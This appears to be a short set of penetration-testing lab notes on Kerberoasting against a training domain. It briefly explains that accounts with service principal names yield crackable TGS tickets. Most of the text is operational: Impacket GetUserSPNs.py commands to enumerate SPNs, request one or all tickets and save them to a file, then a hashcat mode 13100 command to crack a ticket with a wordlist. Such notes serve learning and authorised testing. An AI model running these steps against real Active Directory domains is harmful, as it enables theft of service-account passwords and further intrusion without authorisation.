Kerberoasting:
A SPN(Service Principal Name) is placed on either an SA or user account.
For any account with a SPN, we can request a TGS. (encrypted with the password)
The TGS can be decrypted offline.
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend
Requesting all TGS tickets:
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request
Requesting a single TGS ticket:
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev
Saving the TGS to an output file:
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs
Crack the ticket offline with hashcat:
hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt